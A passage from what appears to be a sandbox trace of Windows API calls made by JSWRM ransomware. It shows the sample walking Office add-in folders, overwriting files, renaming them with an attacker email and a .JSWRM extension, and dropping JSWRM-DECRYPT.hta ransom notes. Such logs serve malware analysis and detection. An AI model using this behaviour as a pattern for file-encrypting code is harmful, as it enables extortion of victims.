lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1036\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1036\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.229] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=72800) returned 1 [0127.229] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.229] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x11c60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x11c60, lpOverlapped=0x0) returned 1 [0127.247] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.247] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x11c60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x11c60, lpOverlapped=0x0) returned 1 [0127.247] CloseHandle (hObject=0x264) returned 1 [0127.247] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1036\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1036\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1036\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1036\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.260] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11c60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.260] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0127.260] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1037", cAlternateFileName="")) returned 1 [0127.260] lstrcmpiW (lpString1="1037", lpString2=".") returned 1 [0127.260] lstrcmpiW (lpString1="1037", lpString2="..") returned 1 [0127.260] lstrcmpiW (lpString1="1037", lpString2="...") returned 1 [0127.260] lstrcmpiW (lpString1="1037", lpString2="windows") returned -1 [0127.260] lstrcmpiW (lpString1="1037", lpString2="recovery") returned -1 [0127.260] lstrcmpiW (lpString1="1037", lpString2="perflogs") returned -1 [0127.260] lstrcmpiW (lpString1="1037", lpString2="documents and settings") returned -1 [0127.260] lstrcmpiW (lpString1="1037", lpString2="$RECYCLE.BIN") returned 1 [0127.260] lstrcmpiW (lpString1="1037", lpString2="system volume information") returned -1 [0127.260] lstrcmpiW (lpString1="1037", lpString2="msocache") returned -1 [0127.261] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1037\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1037\\jswrm-decrypt.hta")) returned 0xffffffff [0127.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1037\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1037\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.262] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.262] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.263] CloseHandle (hObject=0x338) returned 1 [0127.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1037\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1037\\jswrm-decrypt.hta")) returned 0x20 [0127.263] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1037\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x428306ba, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x232140 [0127.264] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0127.264] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x428306ba, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.264] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0127.264] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0127.264] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x428306ba, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x428306ba, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x428306ba, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.264] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0127.264] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0127.264] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0127.264] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0127.264] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0127.264] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0127.264] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0127.264] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0127.264] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0127.264] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0127.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.264] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11460, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.264] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0127.265] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0127.265] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0127.265] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0127.265] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0127.265] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0127.265] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0127.265] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0127.265] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0127.265] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0127.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241010, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241308, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1037\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1037\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.266] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=70752) returned 1 [0127.266] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.266] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x11460, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x11460, lpOverlapped=0x0) returned 1 [0127.272] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.272] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x11460, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x11460, lpOverlapped=0x0) returned 1 [0127.273] CloseHandle (hObject=0x264) returned 1 [0127.273] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1037\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1037\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1037\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1037\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.274] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11460, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.274] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0127.274] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88e2fa3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x88e2fa3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1038", cAlternateFileName="")) returned 1 [0127.274] lstrcmpiW (lpString1="1038", lpString2=".") returned 1 [0127.274] lstrcmpiW (lpString1="1038", lpString2="..") returned 1 [0127.274] lstrcmpiW (lpString1="1038", lpString2="...") returned 1 [0127.274] lstrcmpiW (lpString1="1038", lpString2="windows") returned -1 [0127.274] lstrcmpiW (lpString1="1038", lpString2="recovery") returned -1 [0127.274] lstrcmpiW (lpString1="1038", lpString2="perflogs") returned -1 [0127.274] lstrcmpiW (lpString1="1038", lpString2="documents and settings") returned -1 [0127.275] lstrcmpiW (lpString1="1038", lpString2="$RECYCLE.BIN") returned 1 [0127.275] lstrcmpiW (lpString1="1038", lpString2="system volume information") returned -1 [0127.275] lstrcmpiW (lpString1="1038", lpString2="msocache") returned -1 [0127.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1038\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1038\\jswrm-decrypt.hta")) returned 0xffffffff [0127.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1038\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1038\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.276] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.276] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.277] CloseHandle (hObject=0x338) returned 1 [0127.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1038\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1038\\jswrm-decrypt.hta")) returned 0x20 [0127.277] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1038\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88e2fa3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x42856093, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0127.277] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0127.277] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88e2fa3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x42856093, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.277] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0127.278] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0127.278] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42856093, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x42856093, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x42856093, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0127.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0127.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0127.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0127.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0127.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0127.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0127.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0127.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0127.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0127.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.278] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x88e2fa3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11a60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.278] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0127.278] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0127.278] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0127.278] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0127.278] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0127.278] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0127.278] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0127.278] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0127.278] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0127.278] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0127.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 